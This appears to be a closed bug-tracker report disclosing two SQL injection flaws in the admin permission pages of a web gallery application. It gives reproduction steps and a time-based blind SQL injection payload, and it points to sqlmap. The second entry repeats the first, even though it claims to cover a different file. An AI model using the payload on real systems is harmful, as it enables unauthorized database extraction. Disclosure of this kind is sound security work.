Closed
Description
hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php
1 :
request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'




2:
same as the first, request /admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'



